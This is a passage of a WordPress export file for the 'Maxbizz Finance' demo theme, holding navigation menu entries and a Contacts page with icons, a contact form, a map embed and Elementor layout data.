		<wp:meta_value><![CDATA[2124]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[847]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Blog List</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/blog-list/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/blog-list/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2128</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[blog-list]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>27</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2114]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[768]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Blog Post</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/blog-post/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/blog-post/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2129</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[blog-post]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>28</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2114]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[430]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio Details</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio-details/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/portfolio-details/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2130</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-details]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>18</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2124]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[837]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[ot_portfolio]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Home</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home-2/</link>
		<pubDate>Fri, 04 Dec 2020 07:20:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/?p=2479</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2479</wp:post_id>
		<wp:post_date><![CDATA[2020-12-04 07:20:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-04 07:20:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[home-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>1</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1023]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Contacts</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/contacts/</link>
		<pubDate>Fri, 04 Sep 2020 09:27:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=455</guid>
		<description></description>
		<content:encoded><![CDATA[contact details	        <h3>Our Contacts</h3>	    
		Give us a call or drop by anytime, we endeavour to answer all enquiries within 24 hours on business days. We will be happy to answer your questions.		
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>	        
				<h6>Visit Us Daily</h6>				<p>411 University St, Seattle, USA</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>	        
				<h6><a href="tel:+1-800-456-478-23">Call Us 24/7</a></h6>				<p>+1-800-456-478-23</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>	        
				<h6><a href="mailto: maxbizz@mail.com">Mail Us</a></h6>				<p>maxbizz@mail.com</p>			
										<img width="849" height="878" src="https://maxbizz.s3.amazonaws.com/images/image-contacts.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image-contacts.png 849w, https://maxbizz.s3.amazonaws.com/images/image-contacts-1-290x300.png 290w, https://maxbizz.s3.amazonaws.com/images/image-contacts-1-768x794.png 768w" sizes="(max-width: 849px) 100vw, 849px" />											
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-finance/wp-admin/admin-ajax.php#wpcf7-f1319-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="1319" />
<input type="hidden" name="_wpcf7_version" value="5.3.1" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f1319-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<h4>Ready to Get Started?</h4>
<p><input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /></p>
<p><input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /></p>
<p><input type="text" name="your-site" value="" size="40" aria-invalid="false" placeholder="Website" /></p>
<p><textarea name="your-message" cols="40" rows="10" aria-invalid="false" placeholder="Message..."></textarea></p>
<p><button type="submit">Send Message</button>
</form>		
			<iframe frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="https://maps.google.com/maps?q=411%20University%20St%2C%20Seattle%2C%20USA&amp;t=m&amp;z=10&amp;output=embed&amp;iwloc=near" title="411 University St, Seattle, USA" aria-label="411 University St, Seattle, USA"></iframe>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>455</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:27:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:27:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[contacts]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[457]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"86d48d0","elType":"section","settings":{"gap":"extended","structure":"21","padding":{"unit":"px","top":"116","right":"0","bottom":"0","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"1feabce","elType":"column","settings":{"_column_size":33,"_inline_size":43,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"030e332","elType":"widget","settings":{"sub":"contact details","title":"Our Contacts","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"header_size":"h3","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"588e854","elType":"widget","settings":{"editor":"Give us a call or drop by anytime, we endeavour to answer all enquiries within 24 hours on business days. We will be happy to answer your questions.","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"130afd7","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title":"Visit Us Daily","header_size":"h6","des":"411 University St, Seattle, USA","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"is_line":"","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"icon_space":{"unit":"px","size":76,"sizes":[]},"icon_size":{"unit":"px","size":27,"sizes":[]},"icon_bg_width":{"unit":"px","size":60,"sizes":[]},"radius_box":{"unit":"%","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_bg":"#52C5B633","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"title_space_top":{"unit":"px","size":6,"sizes":[]},"title_space_bottom":{"unit":"px","size":1,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_font_weight":"600"},"elements":[],"widgetType":"iiconbox2"},{"id":"8ab1650","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title":"Call Us 24\/7","header_size":"h6","des":"+1-800-456-478-23","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"is_line":"","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"icon_space":{"unit":"px","size":76,"sizes":[]},"icon_size":{"unit":"px","size":22,"sizes":[]},"icon_bg_width":{"unit":"px","size":60,"sizes":[]},"radius_box":{"unit":"%","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_bg":"#52C5B633","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"title_space_top":{"unit":"px","size":6,"sizes":[]},"title_space_bottom":{"unit":"px","size":1,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_font_weight":"600"},"elements":[],"widgetType":"iiconbox2"},{"id":"f3cf3dd","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title":"Mail Us","header_size":"h6","des":"maxbizz@mail.com","link":{"url":"mailto: maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"is_line":"","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"icon_space":{"unit":"px","size":76,"sizes":[]},"icon_size":{"unit":"px","size":24,"sizes":[]},"icon_bg_width":{"unit":"px","size":60,"sizes":[]},"radius_box":{"unit":"%","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_bg":"#52C5B633","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"title_space_top":{"unit":"px","size":6,"sizes":[]},"title_space_bottom":{"unit":"px","size":1,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600"},"elements":[],"widgetType":"iiconbox2"}],"isInner":false},{"id":"89ca7e2","elType":"column","settings":{"_column_size":66,"_inline_size":56.66499999999999914734871708787977695465087890625,"_inline_size_tablet":100},"elements":[{"id":"4fb28a7","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image-contacts.png","id":465},"image_size":"full","_margin":{"unit":"px","top":"-46","right":"-120","bottom":"0","left":"-70","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"a5be57a","elType":"section","settings":{"margin":{"unit":"px","top":"-245","right":0,"bottom":"0","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-100","right":0,"bottom":"0","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"-10","right":0,"bottom":"50","left":0,"isLinked":false},"z_index":1},"elements":[{"id":"574fa46","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"12e32dc","elType":"widget","settings":{"cf7":"1319","_padding":{"unit":"px","top":"60","right":"60","bottom":"60","left":"60","isLinked":true},"_padding_mobile":{"unit":"px","top":"50","right":"20","bottom":"50","left":"20","isLinked":false},"_background_background":"classic","_background_color":"#FFFFFF","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"ictf7"}],"isInner":false}],"isInner":false},{"id":"de4c36a","elType":"section","settings":{"layout":"full_width","margin":{"unit":"px","top":"-60","right":0,"bottom":"0","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"","right":0,"bottom":"","left":0,"isLinked":true},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false}},"elements":[{"id":"f31c287","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3e66202","elType":"widget","settings":{"address":"411 University St, Seattle, USA","height":{"unit":"px","size":520,"sizes":[]},"css_filters_css_filter":"custom","css_filters_saturate":{"unit":"px","size":0,"sizes":[]}},"elements":[],"widgetType":"google_maps"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:8:"iheading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:3:"sub";i:1;s:5:"title";i:1;s:11:"header_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:5:{s:9:"stitle_bg";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;s:28:"stitle_typography_typography";i:1;s:27:"stitle_typography_font_size";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:9:"iiconbox2";a:3:{s:5:"count";i:3;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:9:"icon_font";i:3;s:5:"title";i:3;s:11:"header_size";i:3;s:3:"des";i:3;s:4:"link";i:3;}}s:5:"style";a:3:{s:17:"style_box_section";a:2:{s:7:"is_line";i:3;s:7:"icon_bg";i:3;}s:18:"style_icon_section";a:6:{s:10:"icon_space";i:3;s:9:"icon_size";i:3;s:13:"icon_bg_width";i:3;s:10:"radius_box";i:3;s:27:"icon_shadow_box_shadow_type";i:3;s:22:"icon_shadow_box_shadow";i:3;}s:21:"style_content_section";a:5:{s:15:"title_space_top";i:3;s:18:"title_space_bottom";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:4;s:19:"_inline_size_tablet";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:1;s:13:"margin_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:1;s:10:"image_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:2:{s:14:"section_layout";a:2:{s:3:"gap";i:1;s:6:"layout";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:6:{s:7:"padding";i:1;s:14:"padding_mobile";i:1;s:6:"margin";i:2;s:13:"margin_tablet";i:2;s:13:"margin_mobile";i:2;s:7:"z_index";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:3:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}s:19:"_section_background";a:2:{s:22:"_background_background";i:1;s:17:"_background_color";i:1;}s:15:"_section_border";a:3:{s:14:"_border_radius";i:1;s:27:"_box_shadow_box_shadow_type";i:1;s:22:"_box_shadow_box_shadow";i:1;}}}}s